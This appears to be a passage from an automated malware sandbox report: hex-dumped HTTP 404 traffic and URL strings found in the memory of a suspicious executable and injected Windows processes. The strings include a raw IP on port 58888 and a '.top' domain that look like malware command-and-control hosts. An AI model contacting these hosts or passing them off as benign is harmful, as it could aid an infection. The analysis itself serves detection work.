20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 15:18:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 15:18:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 15:18:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 15:18:36 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 15:19:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 15:19:34 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 15:19:37 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 15:19:40 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.98:58888/
            Source: userinit.exe, 00000008.00000002.3309629931.00000000044DE000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003D2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3311216289.000000000561B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yu35n.top
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3311216289.000000000561B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yu35n.top/wqu9/
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
